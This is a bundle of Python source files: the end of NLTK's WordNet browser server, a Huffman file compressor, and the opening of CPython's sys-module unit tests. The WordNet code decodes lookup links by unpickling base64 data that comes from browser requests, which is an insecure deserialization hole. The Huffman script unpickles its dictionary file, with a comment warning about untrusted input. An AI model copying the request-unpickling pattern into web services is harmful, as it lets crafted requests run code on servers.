        return base64.urlsafe_b64encode(string).decode()

    @staticmethod
    def decode(string):
        """
        Decode a reference encoded with Reference.encode
        """
        string = base64.urlsafe_b64decode(string.encode())
        word, synset_relations = pickle.loads(string)
        return Reference(word, synset_relations)

    def toggle_synset_relation(self, synset, relation):
        """
        Toggle the display of the relations for the given synset and
        relation type.

        This function will throw a KeyError if the synset is currently
        not being displayed.
        """
        if relation in self.synset_relations[synset.name()]:
            self.synset_relations[synset.name()].remove(relation)
        else:
            self.synset_relations[synset.name()].add(relation)

        return self

    def toggle_synset(self, synset):
        """
        Toggle displaying of the relation types for the given synset
        """
        if synset.name() in self.synset_relations:
            del self.synset_relations[synset.name()]
        else:
            self.synset_relations[synset.name()] = set()

        return self
def make_lookup_link(ref, label):
    """Return an HTML anchor that triggers a lookup for *ref*, shown as *label*."""
    href = "lookup_" + ref.encode()
    return f'<a href="{href}">{label}</a>'
def page_from_word(word):
    """
    Return a HTML page for the given word.

    :type word: str
    :param word: The currently active word
    :return: A tuple (page,word), where page is the new current HTML page
        to be sent to the browser and
        word is the new current word
    :rtype: A tuple (str,str)
    """
    # Delegate to the Reference-based renderer with no relations unfolded.
    return page_from_reference(Reference(word))
def page_from_href(href):
    """
    Returns a tuple of the HTML page built and the new current word

    :param href: The hypertext reference to be solved (a string produced
        by Reference.encode)
    :type href: str
    :return: A tuple (page,word), where page is the new current HTML page
        to be sent to the browser and
        word is the new current word
    :rtype: A tuple (str,str)
    """
    return page_from_reference(Reference.decode(href))
def page_from_reference(href):
    """
    Returns a tuple of the HTML page built and the new current word

    :param href: the Reference naming the word(s) to render and which
        synset relations are unfolded (note: a Reference object, not a
        raw href string — see page_from_href for the string variant)
    :type href: Reference
    :return: A tuple (page,word), where page is the new current HTML page
        to be sent to the browser and
        word is the new current word
    :rtype: A tuple (str,str)
    """
    word = href.word
    pos_forms = defaultdict(list)
    # Normalise: split on commas, lowercase, and join multi-word
    # collocations with underscores as Wordnet stores them.
    words = word.split(",")
    words = [w for w in [w.strip().lower().replace(" ", "_") for w in words] if w != ""]
    if len(words) == 0:
        # No words were found.
        return "", "Please specify a word to search for."

    # This looks up multiple words at once. This is probably not
    # necessary and may lead to problems.
    for w in words:
        for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
            form = wn.morphy(w, pos)
            if form and form not in pos_forms[pos]:
                pos_forms[pos].append(form)
    body = ""
    for pos, pos_str, name in _pos_tuples():
        if pos in pos_forms:
            body += _hlev(3, name) + "\n"
            for w in pos_forms[pos]:
                # Not all words of exc files are in the database, skip
                # to the next word if a KeyError is raised.
                try:
                    body += _collect_all_synsets(w, pos, href.synset_relations)
                except KeyError:
                    pass
    if not body:
        # Fix: the user-facing message previously read "where not found".
        body = "The word or words '%s' were not found in the dictionary." % word
    return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
    """
    Return a static HTML page from the path given.
    """
    # Map each known path to a thunk so the sibling page builders are only
    # evaluated for the path actually requested (same laziness as the
    # original if/elif chain).
    pages = {
        "index_2.html": lambda: get_static_index_page(False),
        "index.html": lambda: get_static_index_page(True),
        "NLTK Wordnet Browser Database Info.html":
            lambda: "Display of Wordnet Database Statistics is not supported",
        "upper_2.html": lambda: get_static_upper_page(False),
        "upper.html": lambda: get_static_upper_page(True),
        "web_help.html": lambda: get_static_web_help_page(),
        "wx_help.html": lambda: get_static_wx_help_page(),
    }
    unknown = lambda: "Internal error: Path for static page '%s' is unknown" % path
    return pages.get(path, unknown)()
def get_static_web_help_page():
    """
    Return the static web help page.
    """
    # NOTE(review): the served text below contains the typos
    # "BrowseServer"/"BrowServer"; fixing them would change runtime
    # output, so they are left untouched here.
    return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2021 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <https://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="https://wordnet.princeton.edu/"><b> https://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="https://www.nltk.org/"><b>https://www.nltk.org/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
    """
    Get the static welcome page.
    """
    # Help text shown to a fresh session, before any search has been run.
    return """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
    """
    Get the static index page.

    The page is a two-row frameset; *with_shutdown* selects whether the
    upper frame variant with the shutdown link is embedded.
    """
    template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2021 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <https://www.nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>

<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
    upper_link = "upper.html" if with_shutdown else "upper_2.html"
    return template % upper_link
def get_static_upper_page(with_shutdown):
    """
    Return the upper frame page,

    If with_shutdown is True then a 'shutdown' button is also provided
    to shutdown the server.
    """
    template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2021 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <https://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word:&nbsp;<input type="text" id="currentWord" size="10" disabled>
Next Word:&nbsp;<input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
    shutdown_link = '<a href="SHUTDOWN THE SERVER">Shutdown</a>' if with_shutdown else ""
    return template % shutdown_link
def usage():
    """
    Display the command line help message.
    """
    # The module docstring documents the CLI flags, so print it verbatim.
    print(__doc__)
def app():
    """
    Parse the command line options and launch the browser accordingly.

    Supported flags: -l/--logfile, -p/--port, -s/--server-mode, -h/--help.
    """
    # Parse and interpret options.
    opts, _ = getopt.getopt(
        argv[1:], "l:p:sh", ["logfile=", "port=", "server-mode", "help"]
    )

    # Defaults: local (non-server) browser on port 8000, no log file.
    port = 8000
    server_mode = False
    help_mode = False
    logfilename = None
    for opt, value in opts:
        if opt in ("-l", "--logfile"):
            logfilename = str(value)
        elif opt in ("-p", "--port"):
            port = int(value)
        elif opt in ("-s", "--server-mode"):
            server_mode = True
        elif opt in ("-h", "--help"):
            help_mode = True

    if help_mode:
        usage()
    else:
        wnb(port, not server_mode, logfilename)
# Allow running this module directly as a script.
if __name__ == "__main__":
    app()

# Public API of this module.
__all__ = ["app"]
|
huffman.py | import argparse
import pickle
import threading
import time
from bitstring import BitArray, BitStream, Bits, ConstBitStream
# Global switch: when True, the tree, code table and translation
# dictionaries are dumped to stdout while a HuffmanTree is built.
debug: bool = True
class Node:
    """One node of the Huffman tree.

    Leaves carry a single data byte; inner nodes aggregate the
    frequencies of their two children.
    """

    freq: int
    data: bytes
    code = None  # can change type from BitArray to Bits
    l_child = None
    r_child = None

    def __init__(self, freq: int, data: bytes = None, l_child=None, r_child=None):
        self.freq = freq
        self.data = data
        self.l_child = l_child
        self.r_child = r_child
        self.code = BitArray()

    def get_child_count(self):
        """Return the number of nodes in the subtree rooted here, this node included."""
        total = 1
        for child in (self.l_child, self.r_child):
            if child is not None:
                total += child.get_child_count()
        return total
class HuffmanTree:
    """Builds a Huffman code over the distinct bytes of an input and uses
    it to encode/decode byte strings via the bitstring library."""

    # NOTE(review): these are class attributes; ``code_list`` in
    # particular is a shared mutable list, so two HuffmanTree instances
    # would append to the same list.  Harmless for this one-tree script,
    # but worth knowing before reuse.
    tree: Node = None
    encode_dict = None  # encode_dict: dict[bytes:Bits] = None
    decode_dict = None  # decode_dict: dict[Bits:bytes] = None
    code_list = []
    data_byte_count = None  # number of input bytes the tree was built from
    encoded_bit_count = None  # bits produced by the last encode() call

    def __init__(self, data: bytes = None):
        # With data=None an empty tree is created; used by decode mode,
        # where decode_dict is loaded from disk afterwards.
        if data is None:
            return
        self.data_byte_count = len(data)
        # 1. iterate over data, create Nodes for different bytes
        node_list: list[Node] = []
        for byte in data:
            byte = byte.to_bytes(length=1, byteorder='big')
            node = [node for node in node_list if node.data == byte]
            node = None if len(node) == 0 else node[0]
            if node is not None:
                node.freq += 1
            else:
                node_list.append(Node(1, byte))
        print(f'finished parsing data, {len(node_list)} different bytes found')
        # 2. create tree by combining nodes until only one is left
        # The two rarest nodes (ties broken by subtree size) are merged
        # under a new parent each round.
        while len(node_list) > 1:
            node_list.sort(key=lambda curr_node: (curr_node.freq, curr_node.get_child_count()), reverse=True)
            l_node, r_node = node_list.pop(), node_list.pop()
            node_list.append(Node(l_node.freq + r_node.freq, l_child=l_node, r_child=r_node))
        self.tree = node_list.pop()
        # 3. traverse tree to set code. left traversal adds '0' to code, right traversal adds '1'
        self.set_code(self.tree)
        if debug:
            self.print_tree(self.tree)
            # NOTE(review): list.sort() returns None, so this prints
            # ``None``; the sort of code_list still happens in place.
            print(self.code_list.sort(key=lambda node: node[0]))
        self.encode_dict = {}
        self.decode_dict = {}
        self.set_dicts(self.tree)
        if debug:
            print(self.encode_dict)
            print(self.decode_dict)

    def set_code(self, node: Node):
        # Recursively assign prefix codes: a child's code is the parent's
        # code plus '0' (left) or '1' (right).
        code: BitArray = node.code
        if node.l_child is not None:
            # append '0b0' to left child of node
            node.l_child.code.append(code)
            node.l_child.code.append('0b0')
            self.set_code(node.l_child)
        if node.r_child is not None:
            # append '0b1' to left child of node
            node.r_child.code.append(code)
            node.r_child.code.append('0b1')
            self.set_code(node.r_child)

    def set_dicts(self, node: Node):
        # Walk the tree and fill the byte->code and code->byte mappings
        # from the leaves.  Codes are frozen to immutable (hashable) Bits.
        if node.data is not None:
            if type(node.code) is BitArray:
                node.code = Bits(node.code)
            self.encode_dict[node.data] = node.code
            self.decode_dict[node.code] = node.data
        if node.l_child is not None:
            self.set_dicts(node.l_child)
        if node.r_child is not None:
            self.set_dicts(node.r_child)

    def print_tree(self, node: Node):
        # Debug helper: dump each leaf and collect a printable line per
        # leaf into the (class-level) code_list.
        if node.data is not None:
            print(f'freq: {node.freq} hex: {node.data.hex()} bin: {Bits(node.data).bin} ascii: {node.data} code: {node.code.bin}')
            self.code_list.append((node.freq, f'freq: {node.freq} hex: {node.data.hex()} bin: {Bits(node.data).bin} ascii: {node.data} code: {node.code.bin}'))
        if node.l_child is not None:
            self.print_tree(node.l_child)
        if node.r_child is not None:
            self.print_tree(node.r_child)

    def encode(self, data: bytes):
        """Translate data byte-by-byte into its Huffman bit string and pad
        it to a whole number of bytes; returns the packed bytes."""
        encoded_data = BitArray()
        for byte in data:
            byte = byte.to_bytes(length=1, byteorder='big')
            if byte not in self.encode_dict:
                print(f'encode error at \'{byte}\'')
                return bytes()
            encoded_data += self.encode_dict[byte]
        self.encoded_bit_count = len(encoded_data)
        # add pad to get a full byte
        pad_len = len(encoded_data) % 8
        if pad_len == 0:
            print('no pad needed')
        else:
            bits = None
            print(f'{pad_len} bits left to full byte')
            # Search for a pad pattern none of whose prefixes is a valid
            # code, so the decoder cannot mistake the pad for data.
            for i in range(2 ** pad_len):
                bits = Bits(int=i, length=pad_len)
                valid_pad = True
                for j in range(pad_len):
                    piece = Bits(bits[:j + 1])
                    if piece in self.decode_dict:
                        valid_pad = False
                if valid_pad:
                    break
            encoded_data += bits
            pad_len = len(encoded_data) % 8
            print(f'added {bits.bin}, {pad_len} bits left to full byte')
        print(f'data size in bits: {self.data_byte_count*8}, encoded data size in bits: {len(encoded_data)}')
        print(f'mean code length: {(len(encoded_data)/self.data_byte_count):.2f}')
        return encoded_data.tobytes()

    def decode(self, data: bytes):
        """Translate an encoded byte string back via decode_dict, reading
        bit by bit and emitting a byte whenever a code matches.  Progress
        is published through the module globals read by thread_log()."""
        decoded_data = bytes()
        bit_stream = ConstBitStream(data)
        print(f'total bits in stream: {len(bit_stream)}')
        chunk_size = 2 ** 9
        piece = BitArray()
        global thread_orig_size
        thread_orig_size = len(bit_stream)
        global thread_size
        while bit_stream.pos != len(bit_stream):
            thread_size = bit_stream.pos
            # Read at most chunk_size bits, fewer at the end of stream.
            read_size = chunk_size if len(bit_stream) - bit_stream.pos > chunk_size else len(
                bit_stream) - bit_stream.pos
            chunk: BitStream = bit_stream.read(read_size)
            # print(read_size, chunk)
            piece = BitArray() if len(piece) == 0 else piece
            while chunk.pos < len(chunk):
                piece.append(chunk.read(1))
                piece_as_bits = Bits(piece)
                if piece_as_bits in self.decode_dict:
                    decoded_data += self.decode_dict[piece_as_bits]
                    piece = BitArray()
        return decoded_data
# Shared progress state: HuffmanTree.decode() publishes the stream size and
# current position here; thread_log() reads them and counts elapsed time.
thread_orig_size = 0
thread_size = 0
seconds = 0
def thread_log():
    """
    Background progress logger for HuffmanTree.decode().

    Runs forever (start it as a daemon thread): every half second it bumps
    the global ``seconds`` counter and prints how far decode() has read
    into the bit stream.
    """
    global seconds
    while True:
        time.sleep(.5)
        seconds += .5
        # Fix: thread_orig_size stays 0 until decode() initialises it, so
        # this thread could divide by zero if it woke up first.  Skip the
        # report until there is something to measure.
        if thread_orig_size == 0:
            continue
        percent = (thread_size / thread_orig_size) * 100
        print(
            f'progress: {thread_size:10} / {thread_orig_size} :: {percent:2.2f}%')
if __name__ == '__main__':
    # Command line interface: encode a file into Huffman-coded bytes plus a
    # pickled decode dictionary, or decode such a file back.
    arg_parser = argparse.ArgumentParser(description='Program to encode or decode a message using a Huffman Tree.')
    arg_parser.add_argument('-m', '--mode', metavar='Mode', type=str, help='encrypt mode (e)\ndecrypt mode (d)',
                            choices=('e', 'd'), required=True)
    arg_parser.add_argument('-i', '--file-in', metavar='Input File', type=str,
                            help='The file from which input will be read.', required=True)
    arg_parser.add_argument('-o', '--file-out', metavar='Output File', type=str,
                            help='The file where output will be written.', required=True)
    arg_parser.add_argument('-d', '--dict', metavar='Dict File', type=str,
                            help='Translation dictionary file path. In encode mode this file will be created/overwritten. In decode mode an existing dictionary file is required for translation.', required=True)
    args = arg_parser.parse_args()
    mode = args.mode
    file_in = args.file_in
    file_out = args.file_out
    file_dict = args.dict
    print(f'found mode {mode}, file_in {file_in}, file_out {file_out}, file_dict {file_dict}')
    if mode == 'e':
        # Fix: files were opened without ever being closed; context
        # managers release the handles even if an error occurs.
        with open(file_in, 'rb') as file_i:
            bytes_in = file_i.read()
        # construct tree
        tree = HuffmanTree(bytes_in)
        # generate output
        bytes_encoded = tree.encode(bytes_in)
        # write output
        with open(file_out, 'wb') as file_o:
            file_o.write(bytes_encoded)
        # write dictionary
        with open(file_dict, 'wb') as file_d:
            file_d.write(pickle.dumps(tree.decode_dict))
    elif mode == 'd':
        # read file_in
        with open(file_in, 'rb') as file_i:
            bytes_in = file_i.read()
        # construct empty tree
        tree = HuffmanTree()
        # read dict
        # NOTE: pickle.loads on an untrusted dictionary file can execute
        # arbitrary code; only load dictionaries you created yourself.
        with open(file_dict, 'rb') as file_d:
            tree.decode_dict = pickle.loads(file_d.read())
        # generate output, with a daemon thread reporting progress
        print(f'start decoding')
        thread = threading.Thread(target=thread_log, daemon=True)
        thread.start()
        bytes_decoded = tree.decode(bytes_in)
        print(f'progress: {thread_size:10} / {thread_orig_size} :: {(thread_size / thread_orig_size) * 100:2.2f}%')
        print(f'seconds: {seconds}')
        # write output
        with open(file_out, 'wb') as file_o:
            file_o.write(bytes_decoded)
|
test_sys.py | import unittest, test.support
from test.support.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import platform
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0

# threading is optional in this build; tests that need it check for None.
try:
    import threading
except ImportError:
    threading = None
class SysModuleTest(unittest.TestCase):
    def setUp(self):
        # Save the streams/hooks the tests below replace, so tearDown can
        # restore them even when a test fails part-way through.
        self.orig_stdout = sys.stdout
        self.orig_stderr = sys.stderr
        self.orig_displayhook = sys.displayhook
    def tearDown(self):
        # Restore interpreter state touched by the tests and reap any
        # child processes spawned via assert_python_* helpers.
        sys.stdout = self.orig_stdout
        sys.stderr = self.orig_stderr
        sys.displayhook = self.orig_displayhook
        test.support.reap_children()
    def test_original_displayhook(self):
        # sys.__displayhook__ must reject zero arguments, ignore None,
        # echo other values to sys.stdout and bind them to builtins._.
        import builtins
        out = io.StringIO()
        sys.stdout = out

        dh = sys.__displayhook__

        self.assertRaises(TypeError, dh)
        if hasattr(builtins, "_"):
            del builtins._

        dh(None)
        self.assertEqual(out.getvalue(), "")
        self.assertTrue(not hasattr(builtins, "_"))
        dh(42)
        self.assertEqual(out.getvalue(), "42\n")
        self.assertEqual(builtins._, 42)

        # Without a sys.stdout the hook must raise rather than crash.
        del sys.stdout
        self.assertRaises(RuntimeError, dh, 42)
    def test_lost_displayhook(self):
        # Evaluating an expression statement with sys.displayhook deleted
        # must raise RuntimeError (restored by tearDown).
        del sys.displayhook
        code = compile("42", "<string>", "single")
        self.assertRaises(RuntimeError, eval, code)
    def test_custom_displayhook(self):
        # An exception raised by a user-installed displayhook propagates
        # out of the evaluation.
        def baddisplayhook(obj):
            raise ValueError

        sys.displayhook = baddisplayhook
        code = compile("42", "<string>", "single")
        self.assertRaises(ValueError, eval, code)
    def test_original_excepthook(self):
        # sys.__excepthook__ writes the traceback to sys.stderr and
        # rejects a zero-argument call.
        err = io.StringIO()
        sys.stderr = err

        eh = sys.__excepthook__

        self.assertRaises(TypeError, eh)
        try:
            raise ValueError(42)
        except ValueError as exc:
            eh(*sys.exc_info())

        self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
    def test_excepthook(self):
        # Passing a non-exception as the value argument is reported on
        # stderr instead of raising.
        with test.support.captured_output("stderr") as stderr:
            sys.excepthook(1, '1', 1)
        self.assertTrue("TypeError: print_exception(): Exception expected for " \
                         "value, str found" in stderr.getvalue())

    # FIXME: testing the code for a lost or replaced excepthook in
    # Python/pythonrun.c::PyErr_PrintEx() is tricky.
    def test_exit(self):
        # Exercise sys.exit() argument handling in-process, then the exit
        # machinery of a real interpreter via subprocesses.

        # call with two arguments
        self.assertRaises(TypeError, sys.exit, 42, 42)

        # call without argument
        with self.assertRaises(SystemExit) as cm:
            sys.exit()
        self.assertIsNone(cm.exception.code)

        rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
        self.assertEqual(rc, 0)
        self.assertEqual(out, b'')
        self.assertEqual(err, b'')

        # call with integer argument
        with self.assertRaises(SystemExit) as cm:
            sys.exit(42)
        self.assertEqual(cm.exception.code, 42)

        # call with tuple argument with one entry
        # entry will be unpacked
        with self.assertRaises(SystemExit) as cm:
            sys.exit((42,))
        self.assertEqual(cm.exception.code, 42)

        # call with string argument
        with self.assertRaises(SystemExit) as cm:
            sys.exit("exit")
        self.assertEqual(cm.exception.code, "exit")

        # call with tuple argument with two entries
        with self.assertRaises(SystemExit) as cm:
            sys.exit((17, 23))
        self.assertEqual(cm.exception.code, (17, 23))

        # test that the exit machinery handles SystemExits properly
        rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
        self.assertEqual(rc, 47)
        self.assertEqual(out, b'')
        self.assertEqual(err, b'')

        # Local helper: run code in a fresh interpreter and check the
        # message written to stderr on exit.
        def check_exit_message(code, expected, **env_vars):
            rc, out, err = assert_python_failure('-c', code, **env_vars)
            self.assertEqual(rc, 1)
            self.assertEqual(out, b'')
            self.assertTrue(err.startswith(expected),
                "%s doesn't start with %s" % (ascii(err), ascii(expected)))

        # test that stderr buffer is flushed before the exit message is written
        # into stderr
        check_exit_message(
            r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
            b"unflushed,message")

        # test that the exit message is written with backslashreplace error
        # handler to stderr
        check_exit_message(
            r'import sys; sys.exit("surrogates:\uDCFF")',
            b"surrogates:\\udcff")

        # test that the unicode message is encoded to the stderr encoding
        # instead of the default encoding (utf8)
        check_exit_message(
            r'import sys; sys.exit("h\xe9")',
            b"h\xe9", PYTHONIOENCODING='latin-1')
    def test_getdefaultencoding(self):
        # The getter takes no arguments and returns a codec name.
        self.assertRaises(TypeError, sys.getdefaultencoding, 42)
        # can't check more than the type, as the user might have changed it
        self.assertIsInstance(sys.getdefaultencoding(), str)

    # testing sys.settrace() is done in test_sys_settrace.py
    # testing sys.setprofile() is done in test_sys_setprofile.py
    def test_setcheckinterval(self):
        # setcheckinterval is deprecated; silence the warning while
        # checking the getter/setter round-trip.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            self.assertRaises(TypeError, sys.setcheckinterval)
            orig = sys.getcheckinterval()
            for n in 0, 100, 120, orig:  # orig last to restore starting state
                sys.setcheckinterval(n)
                self.assertEqual(sys.getcheckinterval(), n)
    @unittest.skipUnless(hasattr(sys, 'getswitchinterval') and threading,
                         'New GIL & threading required for this test.')
    def test_switchinterval(self):
        # Validate argument checking, then round-trip a few values;
        # the finally block restores the original interval.
        self.assertRaises(TypeError, sys.setswitchinterval)
        self.assertRaises(TypeError, sys.setswitchinterval, "a")
        self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
        self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
        orig = sys.getswitchinterval()
        # sanity check
        self.assertTrue(orig < 0.5, orig)
        try:
            for n in 0.00001, 0.05, 3.0, orig:
                sys.setswitchinterval(n)
                self.assertAlmostEqual(sys.getswitchinterval(), n)
        finally:
            sys.setswitchinterval(orig)
    def test_recursionlimit(self):
        # Getter/setter argument checks plus a round-trip; the original
        # limit is restored at the end.
        self.assertRaises(TypeError, sys.getrecursionlimit, 42)
        oldlimit = sys.getrecursionlimit()
        self.assertRaises(TypeError, sys.setrecursionlimit)
        self.assertRaises(ValueError, sys.setrecursionlimit, -42)
        sys.setrecursionlimit(10000)
        self.assertEqual(sys.getrecursionlimit(), 10000)
        sys.setrecursionlimit(oldlimit)
    def test_recursionlimit_recovery(self):
        # After a RecursionError the interpreter must be able to raise it
        # again cleanly (no lingering overflowed state).
        if hasattr(sys, 'gettrace') and sys.gettrace():
            self.skipTest('fatal error if run with a trace function')

        oldlimit = sys.getrecursionlimit()
        def f():
            f()
        try:
            for depth in (10, 25, 50, 75, 100, 250, 1000):
                try:
                    sys.setrecursionlimit(depth)
                except RecursionError:
                    # Issue #25274: The recursion limit is too low at the
                    # current recursion depth
                    continue

                # Issue #5392: test stack overflow after hitting recursion
                # limit twice
                self.assertRaises(RecursionError, f)
                self.assertRaises(RecursionError, f)
        finally:
            sys.setrecursionlimit(oldlimit)
    @test.support.cpython_only
    def test_setrecursionlimit_recursion_depth(self):
        # Issue #25274: Setting a low recursion limit must be blocked if the
        # current recursion depth is already higher than the "lower-water
        # mark". Otherwise, it may not be possible anymore to
        # reset the overflowed flag to 0.
        from _testcapi import get_recursion_depth

        def set_recursion_limit_at_depth(depth, limit):
            # Recurse until the requested depth is reached, then attempt
            # to set the (too low) limit and expect RecursionError.
            recursion_depth = get_recursion_depth()
            if recursion_depth >= depth:
                with self.assertRaises(RecursionError) as cm:
                    sys.setrecursionlimit(limit)
                self.assertRegex(str(cm.exception),
                                 "cannot set the recursion limit to [0-9]+ "
                                 "at the recursion depth [0-9]+: "
                                 "the limit is too low")
            else:
                set_recursion_limit_at_depth(depth, limit)

        oldlimit = sys.getrecursionlimit()
        try:
            sys.setrecursionlimit(1000)

            for limit in (10, 25, 50, 75, 100, 150, 200):
                # formula extracted from _Py_RecursionLimitLowerWaterMark()
                if limit > 200:
                    depth = limit - 50
                else:
                    depth = limit * 3 // 4
                set_recursion_limit_at_depth(depth, limit)
        finally:
            sys.setrecursionlimit(oldlimit)
    @unittest.skipIf(True, 'Fixme: hangs with pypy')
    def test_recursionlimit_fatalerror(self):
        # A fatal error occurs if a second recursion limit is hit when recovering
        # from a first one.
        code = textwrap.dedent("""
            import sys

            def f():
                try:
                    f()
                except RecursionError:
                    f()

            sys.setrecursionlimit(%d)
            f()""")
        with test.support.SuppressCrashReport():
            # Run in a subprocess because the overflow aborts the process.
            for i in (50, 1000):
                sub = subprocess.Popen([sys.executable, '-c', code % i],
                    stderr=subprocess.PIPE)
                err = sub.communicate()[1]
                self.assertTrue(sub.returncode, sub.returncode)
                self.assertIn(
                    b"Fatal Python error: Cannot recover from stack overflow",
                    err)
    def test_getwindowsversion(self):
        # Raise SkipTest if sys doesn't have getwindowsversion attribute
        test.support.get_attribute(sys, "getwindowsversion")
        # The result behaves both as a 5-tuple and as a named structure.
        v = sys.getwindowsversion()
        self.assertEqual(len(v), 5)
        self.assertIsInstance(v[0], int)
        self.assertIsInstance(v[1], int)
        self.assertIsInstance(v[2], int)
        self.assertIsInstance(v[3], int)
        self.assertIsInstance(v[4], str)
        self.assertRaises(IndexError, operator.getitem, v, 5)
        self.assertIsInstance(v.major, int)
        self.assertIsInstance(v.minor, int)
        self.assertIsInstance(v.build, int)
        self.assertIsInstance(v.platform, int)
        self.assertIsInstance(v.service_pack, str)
        self.assertIsInstance(v.service_pack_minor, int)
        self.assertIsInstance(v.service_pack_major, int)
        self.assertIsInstance(v.suite_mask, int)
        self.assertIsInstance(v.product_type, int)
        self.assertEqual(v[0], v.major)
        self.assertEqual(v[1], v.minor)
        self.assertEqual(v[2], v.build)
        self.assertEqual(v[3], v.platform)
        self.assertEqual(v[4], v.service_pack)

        # This is how platform.py calls it. Make sure tuple
        #  still has 5 elements
        maj, min, buildno, plat, csd = sys.getwindowsversion()
    def test_call_tracing(self):
        """sys.call_tracing() rejects a non-tuple second argument."""
        self.assertRaises(TypeError, sys.call_tracing, type, 2)
    @unittest.skipUnless(hasattr(sys, "setdlopenflags"),
                         'test needs sys.setdlopenflags()')
    def test_dlopenflags(self):
        """get/setdlopenflags round-trip and reject bad arguments."""
        self.assertTrue(hasattr(sys, "getdlopenflags"))
        self.assertRaises(TypeError, sys.getdlopenflags, 42)
        oldflags = sys.getdlopenflags()
        self.assertRaises(TypeError, sys.setdlopenflags)
        # A set value must be read back unchanged; restore the original after.
        sys.setdlopenflags(oldflags+1)
        self.assertEqual(sys.getdlopenflags(), oldflags+1)
        sys.setdlopenflags(oldflags)
    @test.support.refcount_test
